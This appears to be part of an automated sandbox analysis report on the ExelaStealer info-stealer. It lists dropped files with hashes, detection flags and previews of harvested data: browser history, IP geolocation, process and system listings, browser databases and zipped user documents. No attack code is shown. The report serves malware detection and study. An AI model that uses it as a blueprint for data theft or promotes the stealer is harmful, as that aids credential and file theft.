                                                                                                  MD5:F18314817A772931B00698F5A9B09E9E
                                                                                                  SHA1:B744180F0287AD559E675650270FB64DC72F3293
                                                                                                  SHA-256:36A65866F8EA99B62DC1443C1177A62F51EDC513D4970D95B51AD4397B4936E1
                                                                                                  SHA-512:087C6FB37447A32F8EE62EAE88B984B4297561D77A1CA17E4B8DB520D0D93A7E30EBD7299E44178DE5078FD3FC74A443C3136966266825BAB2EE97FD792E44A8
                                                                                                  Malicious:false
                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..ID: 1..RL: https://support.mozilla.org/products/firefox..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 2..RL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 3..RL: https://www.mozilla.org/contribute/..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 4..RL: https://www.mozilla.org/about/..Title: None..Visit Count: 0..Last Visit Time: None..=========================================================================
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):266
                                                                                                  Entropy (8bit):4.281502386532761
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:111T8/s5hO7y9MHUXMERwLM7N3U2bX5A3EwAyEY5HLWLASPVXqI:Lv5hOP0X3RwwN3UuJA01K5CLpqI
                                                                                                  MD5:23FB26C06CE6C057071E5346E4BF5BE2
                                                                                                  SHA1:37E496FFFE731FC7AD155EE169642AF0DF7BA0C7
                                                                                                  SHA-256:C7CDD16409A9F45463E6954219417EC5C7BC4EE66A0BCACC754D8D5C221F1E55
                                                                                                  SHA-512:40E58FD7AEC9FBA2399F98374CB238B294FFF15417DBEA05DA1659158E4025795FFFE23E41BACD2A97C8F9E9FC212BF073A3C6C2BC4DB69B8BE168DDB996018B
                                                                                                  Malicious:false
                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..8.46.123.189..United States..New York..America/New_York..Level 3 CenturyLink Communications, LLC AS3356 Level 3 Parent, LLC
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23723
                                                                                                  Entropy (8bit):4.613580146969316
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jiRuTGmRt2RiTNNaWwlgrU0VEPzzVg4pNESw8+29hE1lEiXlqVnZfrcZTGydsTkm:VG+hiy0
                                                                                                  MD5:D2CA9C48293B11CF795EFAC8AE4B959E
                                                                                                  SHA1:49EE92FB742463EA6302E63DFE20D83E1F06FFDC
                                                                                                  SHA-256:A900711552443BA252CD34ADEC731F775194C23238AD7DA552232C662031B260
                                                                                                  SHA-512:E30F01ECA911FE868B40362384B827846C50AD71CC8D35D6B5B99148384A6A2D4C95F14E7D0C686B5382AF9C959C55FAF46931C0FB32A33267C632FAA5A005FB
                                                                                                  Malicious:false
                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 164 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 27'356 K......Image Name: smss.exe...PID: 328...Session Name: Services...Session#: 0...Mem Usage: 1'240 K......Image Name: csrss.exe...PID: 412...Session Name: Services...Session#: 0...Mem Usage: 5'236 K......Image Name: wininit.exe...PID: 488...Session Name: Services...Session#: 0...Mem Usage: 6'740 K......Image Name: csrss.exe...PID: 496...Session Name: Console...Session#: 1...Mem Usage: 5'796 K......Image Name: winlogon.exe...PID: 556
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):142799
                                                                                                  Entropy (8bit):4.350126960481219
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:SKfvqoX6mhzP3Z5OwXJF6Ebu02LZvzpSl79cTSIZ0tdHlwOYUBUgSgshWQCvYh/K:SKOHq9
                                                                                                  MD5:8009165433F99AE08ABB2ABD22DDB4DE
                                                                                                  SHA1:171FCD047CF9168FEE092061CA34550619B81F3F
                                                                                                  SHA-256:5E4CD31A3BD6393998F0E05162235490F2D8AF732C86D34298EA14BAFC6A757E
                                                                                                  SHA-512:CFDABE595F06E86B961E77159DFBE2586D6C5D855DC6FF6C11E05704BEC6E555DB5074D994DC4D5F722CDA543D3A5E194251AF3C0213150ECAD16B7A6DA92044
                                                                                                  Malicious:false
                                                                                                  Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71431-70592-AAOEM...Original Install Date: 03/10/2023, 10:57:18...System Boot Time: 25/09/2023, 09:52:52...System Manufacturer: pDO7PrAaXmaLVnf...System Model: LFvlO26K...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]:
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                  Category:dropped
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):1.1215420383712111
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20480
                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):155648
                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Solara.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9949634
                                                                                                  Entropy (8bit):7.9953008751482715
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:196608:bvcgJ3xukvmvNm1E8giq1g9KDeNMHFJMIDJ+gsAGKkRcSRK3ICT:Lc4m1m1NqV44Fqy+gs1hOIC
                                                                                                  MD5:0615D49BE12C174704A3DAAD945F7B56
                                                                                                  SHA1:90D67801DCFF362CE2C2ACCAFD5010C7F79567D6
                                                                                                  SHA-256:573A7F2FA701A7630318119D9E6D916CB8A0ACD87A0A2797B7197E9AE85C0071
                                                                                                  SHA-512:40D702B8FD2993AEEB09755E760D3611D76F927AE6831AB7066386D3A133257E06330DDFF2D28406B77C1D9E502E79A7A72B8984CE0D795948DA07DD03B9BEA9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...V@hg.........."....).....p...... ..........@.........................................`.................................................4...x....p..,....@..8"..............d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...,....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):155648
                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):51200
                                                                                                  Entropy (8bit):0.8746135976761988
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Solara.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5527040
                                                                                                  Entropy (8bit):6.581917643476937
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:WTbZDzL0GH1JmXFBbbYnHhcWACCR2rbh27ns0ftj371GJfo0PhtpQ9un:ebZDfHmXzIHSWbI2rAnXdxG5PhtpQM
                                                                                                  MD5:089094590DF5698B03A7428A5864ED33
                                                                                                  SHA1:6A4866B798A38E40B61095E2C4A6861B15F4CABB
                                                                                                  SHA-256:C3B138B65057D5A27D859763974A3AFE5DF2693CE64326D36AE8784D092929C7
                                                                                                  SHA-512:001C4AEEDDCBFAA9B979E81B742391C6EC6F9400B23B8B5827C69C7E8C36BD9E8576146F0487C3522DECA21E1488A36C948DFF3C69B2C441406F2081EAD09E4D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....dg.........."...........S.....@..........@..............................T...........`.................................................@...<.....P.. ...pP...............T.x...............................(.......8...............`............................text.............................. ..`.rdata...&.......(..................@..@.data....tO......^O.................@....pdata.......pP......,P.............@..@.00cfg........P.......P.............@..@.tls..........P......0P.............@....rsrc.... ....P.."...2P.............@..@.reloc..x.....T......TT.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                  Category:modified
                                                                                                  Size (bytes):37378
                                                                                                  Entropy (8bit):7.801976888166824
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:Y5yCR1hSgS/uzwe2teqR1pSISPuzs6xofVR1MS5S5uzj91bPR1tSFuzJGxSgd:OR1qdR12dR1QeR1E5
                                                                                                  MD5:22DE69AD3848BB983E3115496ABE474F
                                                                                                  SHA1:B9B122157C91067370C9CDF59DAA33F7D6A41D35
                                                                                                  SHA-256:15507C53894F75C8BB85CFEF7C4258A054681BD2655AAE8F987CB9627CD7748B
                                                                                                  SHA-512:F2C42C63012A1237B0E6F5717986278625174437F89E4AD85D93EBC7487EE2CE5CF94F2CDE124C8138B5EF9B55174DDC19A0455791429324E85CC7F3C28E3FAA
                                                                                                  Malicious:false
                                                                                                  Preview:PK........o.,Z................Desktop/PK........o.,Z................Documents/PK........o.,Z................Downloads/PK........o.,Z................LFOPODGVOH/PK........o.,Z................LIJDSFKJZG/PK..........EWR..............Desktop/AQRFEVRTGL.jpg..Gn@1.D..r(W.m0.........f...;!.B........u-..B:.....z.%2.0...w+..{.\q../..%..9..~K....fOMw./..uLT$_..4q.....w.=.r.Y.@......sE...,.!'QG..).y`..YSi....T...|J..\.b..;.4.Z...|.&.G...b..Iz....q6:.Y..&.c}..1.|......\@.....C..r<.E/W.Y.Hc....i.V....N..f.P.<seW...d..>s...B...BA.&..%..7e....p.Tkj.o.4.k..D*<>5@..}v9.Ur...aa..Q2...7w=...W^.,...&.J...'...u8...J....$..D._....jK].vn-.\.v}.e.p_=GO.l....n..v.hZ..{.#..J5......n.R.|..n.Q.J?_..R.t....8......Q.-..3.q.O^.I.i{.RA,D{..e..W....Y.h......,.l4ub...b...(<_.........~..r........C.s|........Jn8..`.-...6i.C?.>...PR..T.T.../i\...8....XQT.e?..!.X.$G.{~..ZZ....L....4....9......?PK..........EWR..............Desktop/AQRFEVRTGL.xlsx..Gn@1.D..r(W.m0.........f...;!.B........u-..B:...
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Preview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
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:true
                                                                                                  Preview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
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701111373123985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
                                                                                                  MD5:CA5A3E2A0C2DDF92EABE165672425976
                                                                                                  SHA1:1933AC1A510945A766039E7E61D7DA4156E0F074
                                                                                                  SHA-256:4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
                                                                                                  SHA-512:64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
                                                                                                  Malicious:false
                                                                                                  Preview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
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.702862417860716
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                                  MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                                  SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                                  SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                                  SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                                  Malicious:false
                                                                                                  Preview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
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698711683401115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                  MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                  SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                  SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                  SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                  Malicious:true
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698393795110914
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
                                                                                                  MD5:7C5655873C22D2522B13B34841F82038
                                                                                                  SHA1:ED733AE5B3E813B97D69E7283AEB8085EFC62B78
                                                                                                  SHA-256:9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
                                                                                                  SHA-512:A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:true
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701796197804446
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                  MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                  SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                  SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                  SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696835919052288
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                  MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                  SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
